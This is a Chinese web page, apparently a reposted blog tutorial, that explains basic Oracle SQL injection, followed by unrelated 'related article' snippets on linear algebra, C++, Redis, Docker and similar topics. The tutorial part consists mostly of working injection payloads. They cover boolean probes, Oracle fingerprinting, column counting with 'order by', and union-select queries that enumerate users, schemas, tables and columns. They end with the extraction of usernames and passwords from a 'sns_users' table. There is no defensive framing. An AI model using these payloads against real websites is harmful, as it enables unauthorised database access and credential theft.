WEB攻防- Oracle基本注入

ops/2024/9/24 5:52:23/

前置知识

1.dual表
此表是Oracle数据库中的一个自带表,为满足查询条件而产生。与MySQL不同的是,在MySQL中查询语句可以直接是:select 1,2,但是在Oracle中就必须跟一个表名,但是如查询日期是没有表的,就可以使用dual这个表,如下:select sysdate from dual,2.基本用法
select user from dual 查询当前用户
select * from all_tables 查询出所有的表
select * from user_tables 查询出当前用户的表
select * from all_tab_columns 查询出所有的字段
select * from user_tab_columns  查询出当前用户的字段
select * from v$version 查版本
select privilege from session_privs查询当前用户权限
select utl_inaddr.get_host_address from dual查询内网IP3.rownum=1   (限制查询返回的总行数为一条)
对于rownum来说它是oracle系统顺序分配为从查询返回的行的编号,返回的第一行分配的是1,第二行是2,依此类推,这个伪字段可以用于限制查询返回的总行数。 
我们可以用rownum<3来要求他输出2条数据。
它是不支持用>号的,只能是=1或者<n。

案例

1、判断是否存在

and 1=1 返回正常

and 1=2 返回错误


4.判断是否位oracle
可以通过dual来判断,and exists(select * from dual)
通过版本号判断,and (select count(*) from v$version) > 0
通过特有的函数判断,and bitand(1,1)=1
返回正常说明是oracle

5.判断列数 order by 2

6.联合查询

      union select null,null from dual  此处判断整型

      union select 'null','null' from dual 换为字符串型

 获取连接数据库的当前用户

(select SYS_CONTEXT(‘USERENV’,‘CURRENT_USER’)from dual)

获取数据库

(select instance_name from v$instance) 获取当前数据库

(select owner from all_tables where rownum=1)获取第一个数据库

 

(select owner from all_tables where rownum=1 and owner<>'SYS')获取第二个数据库

<>表示不等于

获取表名

(select table_name from user_tables where rownum=1 and table_name like '%users%') from dual

获取列名

(select column_name from user_tab_columns where table_name='sns_users' and rownum=1)

获取第二列名

(select column_name from user_tab_columns where table_name='sns_users' and rownum=1 and column_name<>'USER_NAME')

获取字段内容

id=1 and 1=2 union select USER_NAME,USER_PWD from “sns_users”

union select USER_NAME,USER_PWD from “sns_users” where USER_NAME<>'hu' 获取第二个用户信息 


http://www.ppmy.cn/ops/115139.html

相关文章

线性代数(宋浩版)(4)

2.4逆矩阵 &#xff08;不要把矩阵放在分母上&#xff09; 方阵的行列式 性质1 性质2 性质3 伴随矩阵&#xff08;只有方阵才有&#xff09; 1.求出所有元素的代数余子式&#xff08;矩阵先求行列式&#xff09;。 2.按行求的代数余子式按列放。 定理1&#xff08;重要&…

【C++指南】C++中nullptr的深入解析

&#x1f493; 博客主页&#xff1a;倔强的石头的CSDN主页 &#x1f4dd;Gitee主页&#xff1a;倔强的石头的gitee主页 ⏩ 文章专栏&#xff1a;《C指南》 期待您的关注 目录 引言 一、nullptr的引入背景 二、nullptr的特点 1.类型安全 2.明确的空指针表示 3.函数重载支…

Redis性能测试redis-benchmark

Redis性能测试redis-benchmark redis-benchmark 是 Redis 自带的性能测试工具,主要用于评估 Redis 在不同场景下的性能。以下是使用 redis-benchmark 的一些基本步骤和参数说明: 基本用法 启动测试: 在命令行中运行以下命令: redis-benchmark这将运行一系列默认的测试。 …

【设计模式-适配】

Adapter Pattern&#xff08;适配器模式&#xff09; 是一种结构型设计模式&#xff0c;其主要目的是让不兼容的接口能够协同工作。适配器模式通过引入一个适配器类&#xff0c;转换一个类的接口&#xff0c;使得原本不兼容的接口可以互相配合&#xff0c;从而实现接口的兼容性…

【Android Studio】app:compileDebugJavaWithJavac FAILED解决办法

文章目录 问题描述解决办法 问题描述 Task :app:compileDebugJavaWithJavac FAILED The following annotation processors are not incremental: jetified-butterknife-compiler-10.0.0.jar (com.jakewharton:butterknife-compiler:10.0.0). Make sure all annotation processo…

【Unity-UGUI组件拓展】| Image 组件拓展,支持FIlled和Slice功能并存

🎬【Unity-UGUI组件拓展】| Image 组件拓展,支持FIlled和Slice功能并存一、组件介绍二、组件拓展方法三、完整代码💯总结🎬 博客主页:https://xiaoy.blog.csdn.net 🎥 本文由 呆呆敲代码的小Y 原创,首发于 CSDN🙉 🎄 学习专栏推荐:Unity系统学习专栏 🌲 游戏…

数据分析入门

数据分析入门 一、pandas加载数据 1、根据列加载数据 格式 df对象[列名] df对象.列名例如 # 场景1: 加载1列数据. # 格式: df[列名] 或者 df.列名 df[country] df.country# 场景2: 加载多列数据. # 格式: df[[列名1, 列名2...]] df[[country, year, lifeExp]]2、根据行加载数…

dockerfile案例

dockerfile构建nginx FROM centos:7 RUN rm -rf /etc/yum.repos.d/* ADD Centos-7.repo /etc/yum.repo.d/ ADD epel-7.repo /etc/yum.repo.d/ RUN yum -y install nginx EXPOSE 80 CMD ["/usr/sbin/nginx","-g","daemon off;"]dockerfile构建ng…